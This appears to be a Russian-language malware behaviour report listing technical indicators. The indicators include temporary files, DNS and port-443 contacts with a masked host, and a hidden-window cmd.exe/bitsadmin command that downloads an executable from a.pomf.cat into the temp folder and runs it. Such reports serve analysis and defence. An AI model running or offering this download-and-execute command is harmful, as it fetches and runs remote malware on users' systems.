Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer a /download /priority high https://a.pomf.cat/pudfbr.exe %tmp%\fin.exe & %tmp%\fin.exe & exit
- %WINDIR%\temp\cabf5c.tmp
- %WINDIR%\temp\tar4fd6.tmp
- %WINDIR%\temp\cab4fd5.tmp
- %WINDIR%\temp\tar4fa6.tmp
- %WINDIR%\temp\cab4fa5.tmp
- %WINDIR%\temp\tar3aad.tmp
- %WINDIR%\temp\cab3aac.tmp
- %WINDIR%\temp\tar3a7c.tmp
- %WINDIR%\temp\cab3a7b.tmp
- %WINDIR%\temp\tar2584.tmp
- %WINDIR%\temp\cab2583.tmp
- %WINDIR%\temp\tar2572.tmp
- %WINDIR%\temp\cab2571.tmp
- %WINDIR%\temp\tar2551.tmp
- %WINDIR%\temp\cab2550.tmp
- %WINDIR%\temp\tar2520.tmp
- %WINDIR%\temp\cab251f.tmp
- %WINDIR%\temp\tarf5d.tmp
- %WINDIR%\temp\cab64be.tmp
- %WINDIR%\temp\tar64bf.tmp
- %WINDIR%\temp\cabf5c.tmp
- %WINDIR%\temp\tar4fd6.tmp
- %WINDIR%\temp\cab4fd5.tmp
- %WINDIR%\temp\tar4fa6.tmp
- %WINDIR%\temp\cab4fa5.tmp
- %WINDIR%\temp\tar3aad.tmp
- %WINDIR%\temp\cab3aac.tmp
- %WINDIR%\temp\tar3a7c.tmp
- %WINDIR%\temp\cab3a7b.tmp
- %WINDIR%\temp\tar2584.tmp
- %WINDIR%\temp\cab2583.tmp
- %WINDIR%\temp\tar2572.tmp
- %WINDIR%\temp\cab2571.tmp
- %WINDIR%\temp\tar2551.tmp
- %WINDIR%\temp\cab2550.tmp
- %WINDIR%\temp\tar2520.tmp
- %WINDIR%\temp\cab251f.tmp
- %WINDIR%\temp\tarf5d.tmp
- %WINDIR%\temp\cab64be.tmp
- %WINDIR%\temp\tar64bf.tmp
- 'a.##mf.cat':443
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer a /download /priority high https://a.pomf.cat/pudfbr.exe %tmp%\fin.exe & %tmp%\fin.exe & exit' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer a /download /priority high https://a.pomf.cat/pudfbr.exe %TEMP%\fin.exe